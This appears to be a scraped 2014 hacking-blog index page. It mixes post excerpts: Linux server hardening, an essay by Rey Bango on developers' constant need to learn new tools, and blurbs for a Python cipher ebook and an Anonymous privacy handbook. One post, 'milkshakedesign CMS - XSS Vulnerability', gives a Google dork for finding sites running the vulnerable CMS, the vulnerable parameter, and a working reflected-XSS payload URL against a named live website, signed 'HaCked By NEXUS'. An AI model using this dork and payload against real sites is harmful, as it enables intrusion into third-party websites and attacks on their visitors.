tutorial - Best Antivirus for Linux
Reviewed by 0x000216
on
Thursday, July 03, 2014
Rating: 5
milkshakedesign CMS - XSS Vulnerability
Dork:
Exploit:
Example & Live Demo:
intext:"Website by Milkshake Design" inurl:"/programmeview.php?pid="
Exploit:
programmeview.php?pid=
Example & Live Demo:
http://www.optimumtelevision.com/programmeview.php?pid=310%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29%3C/script%3E
NEXUS
milkshakedesign CMS - XSS Vulnerability
Reviewed by 0x000216
on
Thursday, July 03, 2014
Rating: 5
How to change hair color in Photoshop
Reviewed by 0x000216
on
Thursday, July 03, 2014
Rating: 5
How To Secure the Linux Servers ?
How To Secure Linux Machine Console Access, Troubleshooting, tips and tricks to secure Linux. Linux configurations to secure your Linux server from unauthorized access sharing tips like securing run level one, securing grub using grub-crypt, locking down the operating system using grub, securing interactive start up of Linux machine and then recovering from a deleted /etc/shadow file.
Video:
About The Author:
This tutorial has sent by Alok Srivastava. He is the founder of Network Nuts, India's most loved Linux training company.
How To Secure the Linux Servers ?
Reviewed by 0x000216
on
Thursday, July 03, 2014
Rating: 5
On Slowing Down the Web Developer’s Hamster Wheel by Rey Bango
Last year I wrote an article called The Learning Conundrum which described some of the concerns, frustrations, and fears I (and apparently many others) had in regards to the fast rate of change in our industry. The issue struck such a chord with readers that I followed it up with a presentation at O’Reilly’s Ignite at Fluent event which touched on this. I was happy to have several people thank me for talking about this—it made me feel I wasn’t alone.
It’s no longer possible or, dare I admit, reasonable to expect that one technology or programming language will sustain you singularly through a lasting career. Notice that I used the word ‘singularly’—JavaScript has been my main language for many years now, but I can’t honestly say that the language itself would allow me to remain relevant. Front-end development now encompasses so many different technologies and tools, making JavaScript only one part of the puzzle. The fact that all this tooling is now necessary to really be a professional developer can make it feel like we’re on a perpetual hamster wheel.
I’m not trying to say that things are horrible. To the contrary, I think things are simply more challenging. There are times when I truly wonder if these challenges exist because we’re over-thinking solutions, or are not thinking enough about the actual problem. I’ve seen many cases where new tools are created to tackle problems that have already been seemingly resolved. Or worse, when contributing to or enhancing existing tools would probably have been the better route to take. This makes me wonder how much ego or the “not invented here” mentality comes into play.
And if you look to raise a family, it becomes more challenging to balance your desire to spend valuable quality time versus reading the latest book on JavaScript. The one thing I will unequivocally say is do not sacrifice your family for your job. I learned many years ago that time is fleeting and you will never recover lost time with your partner and children. Learn to strike a good work/life balance and if you can’t, work to find another job that will provide it. I know I sound like I’m on a soapbox but I’m sharing my personal experiences and can promise that I’m only saying it for your own good.
Ultimately though, we have to evolve. As professional developers, we have to come to terms that ours is a constantly-changing field which will forever force us towards perpetual learning. The sooner you come to terms with that reality and embrace it, the sooner you’ll be able to create a plan to ensure that you stay relevant. This is even more important as ageism, my generation’s four-letter word, seems to be becoming a pervasive issue.
In my post, I outlined some of the things that I’ve done to keep up-to-date. Re-reading it now, those things are still relevant. I’m not saying it’s simple, but staying in the game and making yourself consistently valuable is definitely possible.
On Slowing Down the Web Developer’s Hamster Wheel by Rey Bango
Reviewed by 0x000216
on
Thursday, July 03, 2014
Rating: 5
Hacking Secret Ciphers With Python
About the ebook
This book is for complete beginners who do not know anything about encryption, hacking, or cryptography. The ciphers in this book (except for the RSA cipher in the last chapter) are all centuries old (helps develop basic concepts), and modern computers now have the computational power to hack their encrypted messages.
No modern organization or individuals use these ciphers anymore. As such, there’s no reasonable context in which you could get into legal trouble for the information in this book.
This book is for complete beginners who have never programmed before. This book teaches basic programming concepts with the Python programming language. Python is the best language for beginners to learn programming: it is simple and readable yet also a powerful programming language used by professional software developers. The Python software can be downloaded for free from http://python.org and runs on Linux, Windows, OS X, and the Raspberry Pi.
There are two definitions of “hacker”. A hacker is a person who studies a system (such as the rules of a cipher or a piece of software) to understand it so well that they are not limited by the original rules of that system and can creatively modify it to work in new ways. “Hacker” is also used to mean criminals who break into computer systems, violate people’s privacy, and cause damage. This book uses “hacker” in the first sense. Hackers are cool. Criminals are just people who think they’re being clever by breaking stuff. Personally, my day job as a software developer pays me way more for less work than writing a virus or doing an Internet scam would.
On a side note, don’t use any of the encryption programs in this book for your actual files. They’re fun to play with but they don’t provide true security. And in general, you shouldn’t trust the ciphers that you yourself make. As legendary cryptographer Bruce Schneier put it, “Anyone, from the most clueless amateur to the best cryptographer, can create an algorithm that he himself can’t break. It’s not even hard. What is hard is creating an algorithm that no one else can break, even after years of analysis. And the only way to prove that is to subject the algorithm to years of analysis by the best cryptographers around.”
This book is released under a Creative Commons license and is free to copy and distribute (as long as you don’t charge money for it). The book can be downloaded for free from its website at http://inventwithpython.com/hacking. If you ever have questions about how these programs work, feel free to email me at al@inventwithpython.com.
Hacking Secret Ciphers With Python
Reviewed by 0x000216
on
Thursday, July 03, 2014
Rating: 5
Anonymous Security Handbook
About the ebook
This is a security handbook by Anonymous (internet activists or hacktivists) to help it's members stay anonymous. While it has no direct utility for you in the context of anonymous, it has a lot of useful information which which help you protect your privacy on the internet and stay safe as a hacker. You can find more about anonymous here.Anonymous – The Über-Secret Handbook
Note: While I didn't find anything in the ebook which said it was licensed under creative commons, I assumed that it isn't copyrighted and I am free to propagate this material via my blog.
Anonymous Security Handbook
Reviewed by 0x000216
on
Thursday, July 03, 2014
Rating: 5